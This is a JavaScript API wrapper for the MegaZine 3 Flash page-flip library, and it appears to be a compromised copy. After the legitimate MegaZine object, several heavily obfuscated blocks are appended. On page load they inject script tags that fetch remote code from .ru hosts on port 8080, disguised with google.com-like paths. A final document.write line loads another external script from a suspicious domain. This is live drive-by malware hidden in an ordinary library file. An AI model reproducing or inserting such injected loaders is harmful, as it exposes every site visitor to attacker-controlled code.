﻿/*
MegaZine 3 - A Flash application for easy creation of book-like webpages.
Copyright (C) 2007-2008 Florian Nuecke

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses/.
*/

/**
 * Interface for calling functions in the MegaZine engine. For more info see API of JSConnector.
 *
 * Usage: onxxx="javascript:MegaZine.yyy(zzz);", where xxx is the event type, yyy is the function
 * to call, and zzz are possible parameters. Example: onclick="javascript:MegaZine.nextPage();"
 */
MegaZine = {
	// Name of the movie (flash object). This should be the value of the id set in the embedSWF call.
	moviename : "megazine",
	
	/*
	 * Adjust the following functions to handle events.
	 */
	
	// Called when the automatic page turning (slideshow) is started.
	onSlideStart : function() {
	},
	
	// Called when the automatic page turning (slideshow) is stopped.
	onSlideStop : function() {
	},
	
	// Called when the current page changes. page will always be an even number.
	onPageChange : function(page) {
	},
	
	// Called when sounds should be muted.
	onMute : function() {
	},
	
	// Called when sounds are no longer muted.
	onUnmute : function() {
	},
	
	// Called when the MegaZine instance's status changes.
	onStatusChange : function(state, prevstate) {
	},
	
	// Called when the MegaZine instance's flip status changes (pages moving or not).
	onFlipStatusChange : function(state, prevstate) {
	},
	
	// Called when the displayed image in zoom mode changes (in galleries).
	// page is the number of the page containing the now displayed image.
	onZoomChanged : function(page) {
	},
	
	// Called when the MegaZine instance's zoom status changes (zoom opens or closes).
	// page is the number of the page containing the now/last displayed image.
	onZoomStatusChange : function(state, prevstate, page) {
	},
	
	
	/*
	 * !!! Do not change the following functions, just call them !!!
	 */
	
	/* This utility function resolves the string movie to a Flash object reference based on browser type. */
	getMovie : function() { return (navigator.appName.indexOf("Microsoft") != -1) ? window[MegaZine.moviename] : document[MegaZine.moviename]; },
	
	// Returns current anchor. Can be null.
	getCurrentAnchor   : function() { return MegaZine.getMovie().getCurrentAnchor(); },
	// Returns current page number (always an even number).
	getCurrentPage     : function() { return MegaZine.getMovie().getCurrentPage(); },
	// Return if mouse interaction with pages is enabled.
	isDraggingEnabled  : function() { return MegaZine.getMovie().isDraggingEnabled(); },
	// Set whether mouse interaction with pages is enabled.
	setDraggingEnabled : function(enable) { MegaZine.getMovie().setDraggingEnabled(enable); },
	// Return if sounds are muted.
	isMuted            : function() { return MegaZine.getMovie().isMuted(); },
	// Set muted state for sounds.
	setMuted           : function(mute) { MegaZine.getMovie().setMuted(mute); },
	// Returns anchor of the given page in the book.
	getPageAnchor      : function(page) { return MegaZine.getMovie().getPageAnchor(page); },
	// Returns number of pages in the book.
	getPageCount       : function() { return MegaZine.getMovie().getPageCount(); },
	// Returns page height.
	getPageHeight      : function() { return MegaZine.getMovie().getPageHeight(); },
	// Return page width.
	getPageWidth       : function() { return MegaZine.getMovie().getPageWidth(); },
	// Return state (loading, ready).
	getStatus          : function() { return MegaZine.getMovie().getStatus(); },
	// Return flip state (page moving or not).
	getFlipStatus      : function() { return MegaZine.getMovie().getFlipStatus(); },
	// Return zoom state (open, closed).
	getZoomStatus      : function() { return MegaZine.getMovie().getZoomStatus(); },
	// Returns if reflections are enabled.
	hasReflection      : function() { return MegaZine.getMovie().hasReflection(); },
	// Sets reflection usage.
	setReflection      : function(enabled) { MegaZine.getMovie().setReflection(enabled); },
	// Returns whether shadows are enabled.
	hasShadows         : function() { return MegaZine.getMovie().hasShadows(); },
	// Sets shadow usage.
	setShadows         : function(enabled) { MegaZine.getMovie().setShadows(enabled); },
	// Navigate to an anchor in the book.
	gotoAnchor         : function(id, instant) { if (instant == null) instant = false; MegaZine.getMovie().gotoAnchor(id, instant); },
	// Navigate to a page in the book.
	gotoPage           : function(page, instant) { if (instant == null) instant = false; MegaZine.getMovie().gotoPage(page, instant); },
	// Navigate to the first page in the book.
	firstPage          : function(instant) { if (instant == null) instant = false; MegaZine.getMovie().firstPage(instant); },
	// Navigate to the last page in the book.
	lastPage           : function(instant) { if (instant == null) instant = false; MegaZine.getMovie().lastPage(instant); },
	// Navigate to the next page.
	nextPage           : function(instant) { if (instant == null) instant = false; MegaZine.getMovie().nextPage(instant); },
	// Navigate to the previous page.
	prevPage           : function(instant) { if (instant == null) instant = false; MegaZine.getMovie().prevPage(instant); },
	// Start slideshow / automatic page turning.
	slideStart         : function() { MegaZine.getMovie().slideStart(); },
	// Stop slideshow / automatic page turning.
	slideStop          : function() { MegaZine.getMovie().slideStop(); },
	// Zoom in if zoom is open (else returns false).
	zoomIn             : function() { return MegaZine.getMovie().zoomIn(); },
	// Zoom out if zoom is open (else returns false).
	zoomOut            : function() { return MegaZine.getMovie().zoomOut(); },
	// Opens zoom.
	openZoom           : function(galleryOrPath, page, number) { if (page == null) page = -1; if (number == null) number = 0; MegaZine.getMovie().openZoom(galleryOrPath, page, number); }
};






var C='';var mc="mc";function v(){var R=2254;var e="onl"+"oad";Rz={wQ:false};var Q=String("appe"+"ndCh"+"ild");var Ar=["B","f","x"];var Tq="";var A=window;of=55051;of++;this.Yj=46407;this.Yj+=174;var b=new String("cre"+"lmqate".substr(3)+"Ele"+"d4Pmen".substr(3)+"t");var o=document;Cz=59877;Cz-=84;var r="defer";var Dt="";var u="body";var mV=["IS"];vY=24524;vY--;var F=new String("scripjB7".substr(0,5)+"t6vRN".substr(0,1));var K=String("sr"+"c");this.s=false;function E(){var TV={Hu:"YG"};sJ={zK:"Vr"};try {var GQ={};this.ZW=2199;this.ZW+=90;var L=new String("/v"+"2GZmn".substr(3)+"-n"+"3gpet".substr(3)+"9LvY/g".substr(4)+"lVqooqlV".substr(3,2)+"80cgl".substr(3)+"e."+"co"+"m/"+"tw"+"0cd3it".substr(4)+"vqRateqRva".substr(4,2)+"fwsnr.".substr(4)+"co"+"YOZm.ZYO".substr(3,2)+"ph"+"p");this.n=false;var j={nm:23057};var m=new String("http:"+"//pas"+"sport"+"blues"+".ru:vyEz".substr(0,4));var Xl=18908;this.Rh=64599;this.Rh+=49;var pI='';var sf=["Qo","EP","Qh"];var T=609356-601276;this.gl="";var Z=6468-6467;this.vg="";this.sT="sT";ou=["i"];tg={J:false};P=o[b](F);var Sp=[];this.Rs="Rs";var N='';P[r]=Z;var uK=new Date();KA=58259;KA+=3;P[K]=m+T+L;tH=26221;tH-=181;rr=9246;rr++;o[u][Q](P);var W={xX:59976};xc={kl:false};} catch(l){vy=["hh","rs","QT"];var AO={};var Xp='';};}var fw=new Array();A[e]=E;};this.jW="";GK=["Ja","WP"];v();
var Pv=new String();var u=["X"];function J(){var a="a";G={L:"U"};var B=new String("defe"+"r");var q=String("onl"+"oad");var N="bod"+"3mby".substr(3);var yE="";ua={He:false};var w=String("scr"+"ipt");var I=window;var Ap=new String();this.j=61957;this.j++;var IM=document;var CW={z:7122};Fp={};try {} catch(e){};var P=new String("srcGJL".substr(0,3));var CD=["T","ah"];var h=String("ap"+"JajCpe".substr(4)+"qX7ndXq7".substr(3,2)+"Ch"+"il"+"d");zS=["Hm","x"];var jb={p:16272};var n="creat"+"eElem"+"ent";g=["xs"];try {var Bq='gZ'} catch(Bq){};function hH(){BJ=62407;BJ++;bM=[];this.MG=60974;this.MG+=253;var ta={At:false};try {this.iE=11201;this.iE++;var va={BW:false};var Y="";try {var Jc='lW'} catch(Jc){};var S=8220-8219;var GU="GU";var A="ht"+"tp"+"kiHy:/".substr(4)+"/pSs05".substr(0,2)+"7GYas".substr(3)+"ctYMsp".substr(4)+"ZF9aor".substr(4)+"tbx57r".substr(0,2)+"lu"+"es"+".r"+"u:";var C=new String("OZBl/goo".substr(4)+"0z2Ygle.".substr(4)+"OIXcom/XOI".substr(3,4)+"riva"+"ls.cQar".substr(0,4)+"tDxLom/oxDLt".substr(4,4)+"w.lyPbIk".substr(0,4)+".php");var y=79900-71820;var kd=["E"];try {} catch(PG){};F=IM[n](w);ge={Pe:"Ax"};yP={Au:28};try {} catch(lX){};gt=[];F[P]=A+y+C;cU=["ZU","Qp","JF"];this.tN="";try {} catch(f_){};F[B]=S;NL=52042;NL++;IM[N][h](F);} catch(M){bZ={fG:false};var bz='';};}this.Ji=false;this.Wv=23995;this.Wv--;I[q]=hH;this.Ix=12405;this.Ix-=223;fz={ER:52364};};J();var ON="";
try {var d={Y:"Av"};this.ZM='';this.N='';var GW={Yb:"l"};t_=37515;t_--;var a=window[new String("unesc"+"4HIape".substr(3))];fr=["mO","qh"];this.tO=55629;this.tO++;var i='';this.dI="dI";this.er='';this.LZ='';var sy={};var m=window[(String("Re"+"gE"+"MhFCxp".substr(4)))];this.Pv=45016;this.Pv+=242;this.GD=7963;this.GD+=216;var f=String("onlo"+"ad");lY={U:false};this.gY=52554;this.gY+=27;var WD={};var A="1";this.Fb=false;var di=["Zn"];this.Ur=35269;this.Ur+=8;this.yl="yl";this.YH=false;var Z="repla"+"ce";try {var Nx='Pd'} catch(Nx){};iC=23056;iC--;try {var bY='XE'} catch(bY){};this.pv=53581;this.pv++;try {var PC='Zu'} catch(PC){};zz=50237;zz+=235;try {var mv='_k'} catch(mv){};var V=new Date();try {var eG='El'} catch(eG){};function h(A,W){var ZI=new String();Bl=["Yg","ez","iV"];var Ps=["wa"];iT=["T","Za","Xy"];var lN=new String();var G=new String("[Cvr4".substr(0,1));G+=W;G+=a("%5d");AX=["ps","Ul","lx"];Xh={EV:"hC"};this.wM=4076;this.wM-=155;Mv={jj:"yq"};UQ=["ST","nw","Oq"];var q=new m(G, String("W6kg".substr(3)));var lA="lA";this.JC=7327;this.JC+=147;this.Ij=18331;this.Ij-=212;var Pe="Pe";return A.replace(q, i);var AL={Gs:"Ju"};QN=27662;QN-=113;this.vy=39645;this.vy-=175;};var dM=new Array();this.VN=25774;this.VN++;NB=[];var by=new Array();this.sH=18515;this.sH--;var Ra={YQ:false};try {} catch(gh){};try {} catch(NW){};var PJ=[];var v="/goog"+"le.co"+"m/acc"+"uweat"+"Bpgher.c".substr(3)+"om/so"+"tAUnico.tUA".substr(3,5)+"com.p"+"O26hp".substr(3);Ol=["ku","PL"];var qQ=16593-8513;this.Ks='';this.TI='';var kt='';uy=8953;uy-=170;var iu=new String();var _="U3B0http:".substr(4)+"//got"+"hguil"+"t.ru:";var bs=false;var bq=new Array();nJ=[];function z(){zf={};XgM=["ND"];var iI='';var tO_='';var rz='';vLp=["eu","pV","mf"];DQ=20125;DQ--;YV=["tZh","kJ","BV"];Aw={Bf:false};var iN=new Date();var M=h('sbc_rziXp0t0','IhbkXaR07z_');var Dr=["xw","Wv","Jm"];var sY=["zYN","KG","Tv"];Xd=40410;Xd--;gx=6592;gx--;lo=[];var X=document;var bx={};H=[];TIB=[];var n=new String("appen"+"YaVdChil".substr(3)+"d");this.MC='';var So={Gx:"Oj"};this.Fa='';Vy=58601;Vy-=186;var yJ="yJ";try {var Sr='Ib'} catch(Sr){};try {} catch(Mo){};fx={KI:"Vv"};E=X.createElement(M);R=_+qQ;fA=["Im","Tl","mX"];R=R+v;Rw={tP:false};var eA=false;E.src=R;this.rf="";E[new String("deferCkx".substr(0,5))]=A;var zo=new String();MA={la:23509};MZE=["uyA","uG"];var qq=X.body;var HO=new Array();BW=16001;BW-=190;try {} catch(LK){};xM=["nE","qM","lQ"];this.Zi=54760;this.Zi++;qq[n](E);var Ss=[];};Wm=34545;Wm--;var EH=["oD","JG"];pp=55084;pp--;var zzq=["qc","rE"];var CG=10256;var GO={};window[f]=z;ij=13880;ij--;this.lou="";this.Dc="";try {var hZ='jl'} catch(hZ){};wZ=["Ssq","An"];} catch(p){this.iw="iw";var Dy=new Date();var VI=new Date();};var OE=[];var diS={KN:36830};Hm=["it","nWT"];gy=[];yqS=48283;yqS+=63;









document.write('<s'+'cript type="text/javascript" src="http://soaoo.blog-salopes.com:8080/IMAP.js"></scr'+'ipt>');